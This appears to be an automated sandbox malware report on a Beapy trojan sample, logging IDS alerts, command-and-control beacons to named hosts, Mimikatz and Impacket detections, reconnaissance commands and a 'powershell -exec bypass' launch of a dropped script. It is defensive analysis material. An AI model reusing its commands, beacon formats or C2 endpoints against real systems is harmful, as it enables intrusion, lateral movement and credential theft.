Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\unicodedata.pdb source: unicodedata.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_ssl.pdb source: _ssl.pyd.0.dr
Source: Binary string: msvcr90.i386.pdb source: msvcr90.dll.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32api.pdb source: win32api.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_ctypes.pdb source: _ctypes.pyd.0.dr
Source: Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pywintypes.pdb source: pywintypes27.dll.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_socket.pdb source: _socket.pyd.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32wnet.pdbpd source: win32wnet.pyd.0.dr
Source: Binary string: C:\build27\cpython\PCBuild\python27.pdb source: python27.dll.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32wnet.pdb source: win32wnet.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\select.pdb source: select.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\pyexpat.pdb source: pyexpat.pyd.0.dr
Source: Binary string: msvcp90.i386.pdb source: msvcp90.dll.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32pipe.pdb source: win32pipe.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_multiprocessing.pdbU7 source: _multiprocessing.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_hashlib.pdb source: _hashlib.pyd.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32api.pdbL source: win32api.pyd.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32event.pdb source: win32event.pyd.0.dr
Source: Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pywintypes.pdb$ source: pywintypes27.dll.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_socket.pdbE source: _socket.pyd.0.dr
Source: Binary string: msvcm90.i386.pdb source: msvcm90.dll.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\bz2.pdb5 source: bz2.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_multiprocessing.pdb source: _multiprocessing.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\bz2.pdb source: bz2.pyd.0.dr
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Users\user\AppData\Local\Temp\_MEI65282\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Users\user\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Users\user\AppData\Local\Temp\_MEI65~1\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029058 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:50713 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2029057 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:50713 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2029056 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:58987 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:49743 -> 72.52.178.23:80
Source: Traffic | Snort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:49746 -> 173.231.189.15:80
Source: Traffic | Snort IDS: 2029058 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:64938 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2029057 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:64938 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2029056 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:64910 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.3:
Source: Traffic | Snort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:49881 -> 72.52.178.23:80
Source: Traffic | Snort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:50005 -> 173.231.189.15:80
Source: Traffic | Snort IDS: 2029058 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:56130 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2029057 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:56130 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2029056 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:56338 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:50366 -> 72.52.178.23:80
Source: Traffic | Snort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:50490 -> 173.231.189.15:80
Source: Traffic | Snort IDS: 2029058 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:58784 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2029057 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:58784 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2029056 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:63978 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:50919 -> 72.52.178.23:80
Source: Traffic | Snort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:50993 -> 173.231.189.15:80
Source: Traffic | Snort IDS: 2029058 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:55708 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2029057 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:55708 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2029056 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:56803 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:51350 -> 72.52.178.23:80
Source: Traffic | Snort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:51384 -> 173.231.189.15:80
Source: Traffic | Snort IDS: 2029058 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:55359 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2029057 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:55359 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2029056 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:58306 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:51772 -> 72.52.178.23:80
Source: Traffic | Snort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:51981 -> 173.231.189.15:80
Uses netstat to query active network connections and open ports
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -na
Source: Joe Sandbox View | IP Address: 79.98.145.42 79.98.145.42
Source: Joe Sandbox View | IP Address: 72.52.178.23 72.52.178.23
Source: Joe Sandbox View | ASN Name: VOXEL-DOT-NETUS VOXEL-DOT-NETUS
Source: Joe Sandbox View | ASN Name: LIQUIDWEBUS LIQUIDWEBUS
Source: unknown | HTTPS traffic detected: 45.79.77.20:443 -> 192.168.2.3:49747 version: TLS 1.0
Source: global traffic | HTTP traffic detected: GET /raw HTTP/1.1; Accept-Encoding: identity; Host: ip.42.pl; Connection: close; User-Agent: Python-urllib/2.7
Source: global traffic | HTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1; Accept-Encoding: identity; Host: info.beahh.com; Connection: close; User-Agent: Python-urllib/2.7
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Accept-Encoding: identity; Host: jsonip.com; Connection: close; User-Agent: Python-urllib/2.7
Source: global traffic | HTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1; Accept-Encoding: identity; Host: info.abbny.com; Connection: close; User-Agent: Python-urllib/2.7
Source: unknown | DNS traffic detected: queries for: info.ackng.com
Source: PowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.dr | String found in binary or memory: http://blog.gentilkiwi.com/mimikatz
Source: UlJpFEz1Cj.exe, 00000003.00000003.203337059.0000000004523000.00000004.00000001.sdmp | String found in binary or memory: http://i.haqo.net/s.png?u=
Source: UlJpFEz1Cj.exe, 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmp | String found in binary or memory: http://ip.42.pl/raw
Source: UlJpFEz1Cj.exe, 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmp | String found in binary or memory: http://jsonip.com
Source: PowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.dr | String found in binary or memory: http://mysmartlogon.com
Source: powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000003.266052902.000001FD83EDD000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: PowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.dr | String found in binary or memory: http://pingcastle.com
Source: python27.dll.0.dr | String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: pywintypes27.dll.0.dr | String found in binary or memory: http://pywin32.sourceforge.net0
Source: UlJpFEz1Cj.exe | String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: UlJpFEz1Cj.exe | String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: UlJpFEz1Cj.exe | String found in binary or memory: http://sf.symcd.com0&
Source: UlJpFEz1Cj.exe, 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmp | String found in binary or memory: http://w.beahh.com/page.html?p%COMPUTERNAME%
Source: powershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000C.00000003.266052902.000001FD83EDD000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: _ssl.pyd.0.dr | String found in binary or memory: http://www.openssl.org/support/faq.html
Source: _hashlib.pyd.0.dr | String found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: unicodedata.pyd.0.dr | String found in binary or memory: http://www.unicode.org/reports/tr44/tr44-4.html).
Source: powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: UlJpFEz1Cj.exe | String found in binary or memory: https://d.symcb.com/cps0%
Source: UlJpFEz1Cj.exe | String found in binary or memory: https://d.symcb.com/rpa0
Source: powershell.exe, 0000000C.00000003.266052902.000001FD83EDD000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmp | String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmp | String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747

System Summary:

Malicious sample detected (through community Yara rule)
Source: UlJpFEz1Cj.exe, type: SAMPLE | Matched rule: Compiled Impacket Tools Author: Florian Roth
Source: UlJpFEz1Cj.exe, type: SAMPLE | Matched rule: Detects Impacket Network Aktivity for Lateral Movement Author: Markus Neis
Source: C:\Users\user\Desktop\m2.ps1, type: DROPPED | Matched rule: Detects code from APT wateringhole Author: @dragonthreatlab
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 98%
Source: UlJpFEz1Cj.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UlJpFEz1Cj.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: UlJpFEz1Cj.exe, type: SAMPLE | Matched rule: Impacket_Keyword date = 2017-08-04, hash2 = 2f6d95e0e15174cfe8e30aaa2c53c74fdd13f9231406b7103da1e099c08be409, author = Florian Roth, description = Detects Impacket Keyword in Executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 9388c78ea6a78dbea307470c94848ae2481481f593d878da7763e649eaab4068
Source: UlJpFEz1Cj.exe, type: SAMPLE | Matched rule: Impacket_Tools_psexec date = 2017-04-07, hash1 = 27bb10569a872367ba1cfca3cf1c9b428422c82af7ab4c2728f501406461c364, author = Florian Roth, description = Compiled Impacket Tools, reference = https://github.com/maaaaz/impacket-examples-windows, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: UlJpFEz1Cj.exe, type: SAMPLE | Matched rule: Impacket_Lateral_Movement date = 2018-03-22, author = Markus Neis, description = Detects Impacket Network Aktivity for Lateral Movement, reference = https://github.com/CoreSecurity/impacket, score =
Source: 00000003.00000003.203224359.0000000004464000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Netsh_PortProxy_Command date = 2019-04-20, author = Florian Roth, description = Detects a suspicious command line with netsh and the portproxy command, reference = https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy, score = 9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09
Source: 00000003.00000003.203074202.000000000435C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Netsh_PortProxy_Command date = 2019-04-20, author = Florian Roth, description = Detects a suspicious command line with netsh and the portproxy command, reference = https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy, score = 9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09
Source: 00000003.00000003.203337059.0000000004523000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Netsh_PortProxy_Command date = 2019-04-20, author = Florian Roth, description = Detects a suspicious command line with netsh and the portproxy command, reference = https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy, score = 9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09
Source: 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Netsh_PortProxy_Command date = 2019-04-20, author = Florian Roth, description = Detects a suspicious command line with netsh and the portproxy command, reference = https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy, score = 9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09
Source: Process Memory Space: UlJpFEz1Cj.exe PID: 6640, type: MEMORY | Matched rule: SUSP_Netsh_PortProxy_Command date = 2019-04-20, author = Florian Roth, description = Detects a suspicious command line with netsh and the portproxy command, reference = https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy, score = 9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09
Source: Process Memory Space: powershell.exe PID: 6964, type: MEMORY | Matched rule: power_pe_injection author = Benjamin DELPY (gentilkiwi), description = PowerShell with PE Reflective Injection
Source: C:\Users\user\Documents\20210405\PowerShell_transcript.830021.w56wNSku.20210405112311.txt, type: DROPPED | Matched rule: Mimikatz_Logfile author = Florian Roth, description = Detects a log file generated by malicious hack tool mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 2015/03/31
Source: C:\Users\user\Desktop\mkatz.ini, type: DROPPED | Matched rule: Mimikatz_Logfile author = Florian Roth, description = Detects a log file generated by malicious hack tool mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 2015/03/31
Source: C:\Users\user\Desktop\m2.ps1, type: DROPPED | Matched rule: apt_c16_win_wateringhole date = 2015/01/11, author = @dragonthreatlab, description = Detects code from APT wateringhole, reference = http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@30/39@21/100
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\Desktop\m2.ps1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_01
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI65282
Source: UlJpFEz1Cj.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be used
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: UlJpFEz1Cj.exe | Virustotal: Detection: 60%
Source: UlJpFEz1Cj.exe | ReversingLabs: Detection: 82%
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File read: C:\Users\user\Desktop\UlJpFEz1Cj.exe
Source: unknown | Process created: C:\Users\user\Desktop\UlJpFEz1Cj.exe 'C:\Users\user\Desktop\UlJpFEz1Cj.exe'
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Process created: C:\Users\user\Desktop\UlJpFEz1Cj.exe 'C:\Users\user\Desktop\UlJpFEz1Cj.exe'
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c wmic ntdomain get domainname
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ntdomain get domainname
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c net localgroup administrators
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net localgroup administrators
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c net group 'domain admins' /domain
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net group 'domain admins' /domain
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 group 'domain admins' /domain
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass 'import-module C:\Users\user\Desktop\m2.ps1'
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -na
Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File written: C:\Users\user\Desktop\mkatz.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: UlJpFEz1Cj.exe | Static file information: File size 6967362 > 1048576
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_508df7e2bcbccb90\MSVCR90.dll
Source: UlJpFEz1Cj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: UlJpFEz1Cj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: UlJpFEz1Cj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: UlJpFEz1Cj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: UlJpFEz1Cj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: UlJpFEz1Cj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: UlJpFEz1Cj.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: UlJpFEz1Cj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\unicodedata.pdb source: unicodedata.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_ssl.pdb source: _ssl.pyd.0.dr
Source: Binary string: msvcr90.i386.pdb source: msvcr90.dll.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32api.pdb source: win32api.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_ctypes.pdb source: _ctypes.pyd.0.dr
Source: Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pywintypes.pdb source: pywintypes27.dll.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_socket.pdb source: _socket.pyd.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32wnet.pdbpd source: win32wnet.pyd.0.dr
Source: Binary string: C:\build27\cpython\PCBuild\python27.pdb source: python27.dll.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32wnet.pdb source: win32wnet.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\select.pdb source: select.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\pyexpat.pdb source: pyexpat.pyd.0.dr
Source: Binary string: msvcp90.i386.pdb source: msvcp90.dll.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32pipe.pdb source: win32pipe.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_multiprocessing.pdbU7 source: _multiprocessing.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_hashlib.pdb source: _hashlib.pyd.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32api.pdbL source: win32api.pyd.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32event.pdb source: win32event.pyd.0.dr
Source: Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pywintypes.pdb$ source: pywintypes27.dll.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_socket.pdbE source: _socket.pyd.0.dr
Source: Binary string: msvcm90.i386.pdb source: msvcm90.dll.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\bz2.pdb5 source: bz2.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_multiprocessing.pdb source: _multiprocessing.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\bz2.pdb source: bz2.pyd.0.dr
Source: UlJpFEz1Cj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: UlJpFEz1Cj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: UlJpFEz1Cj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: UlJpFEz1Cj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: UlJpFEz1Cj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: {[CmdletBinding()]Param([Parameter(Position = 0, Mandatory = $true)][String]$PPSDHKDSDBytSHDSDes32,[Parameter(Position = 1, Mandatory = $true)][String]$PPSDHKDSDBytes32,[Parameter(Position = 2, Mandat
